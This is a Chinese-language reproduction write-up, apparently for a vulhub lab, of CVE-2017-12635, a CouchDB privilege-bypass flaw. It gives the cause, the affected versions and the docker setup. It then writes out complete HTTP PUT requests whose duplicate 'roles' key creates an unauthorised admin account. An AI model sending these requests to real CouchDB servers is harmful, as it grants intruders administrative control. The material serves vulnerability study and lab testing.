menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 029-Couchdb chevron_right 001-CVE-2017-12635 Couchdb 垂直权限绕过漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2017-12635 Couchdb 垂直权限绕过漏洞.md
    1.9 KB / 2021-07-17 00:01:24
        # CVE-2017-12635 Couchdb 垂直权限绕过漏洞
    
    ## 一、漏洞简介
    
    在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
    
    ## 二、漏洞影响
    
    小于 1.7.0 以及 小于 2.1.1
    
    ## 三、复现过程
    
    环境搭建
    
    
    ```
    docker-compose build
    docker-compose up -d
    ```
    
    环境启动后,访问`http://url:5984/_utils/`即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。
    
    **漏洞复现**
    
    首先,发送如下数据包:
    
    
    ```bash
    PUT /_users/org.couchdb.user:vulhub HTTP/1.1
    Host: www.hacked.com.cn:5984
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 90
    
    {
      "type": "user",
      "name": "vulhub",
      "roles": ["_admin"],
      "password": "vulhub"
    }
    ```
    
    可见,返回403错误:`{"error":"forbidden","reason":"Only _admin may set roles"}`,只有管理员才能设置Role角色:
    
    ![](images/15889494212520.png)
    
    
    发送包含两个roles的数据包,即可绕过限制:
    
    
    ```bash
    PUT /_users/org.couchdb.user:vulhub HTTP/1.1
    Host: www.hacked.com.cn:5984
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 108
    
    {
      "type": "user",
      "name": "vulhub",
      "roles": ["_admin"],
      "roles": [],
      "password": "vulhub"
    }
    ```
    
    成功创建管理员,账户密码均为vulhub:
    
    ![](images/15889494540102.png)
    
    
    再次访问`http://url:5984/_utils/`,输入账户密码vulhub,可以成功登录:
    
    ![](images/15889494701008.png)
    
    
    **参考链接**
    
    https://vulhub.org/#/environments/couchdb/CVE-2017-12635/
    
    links
    file_download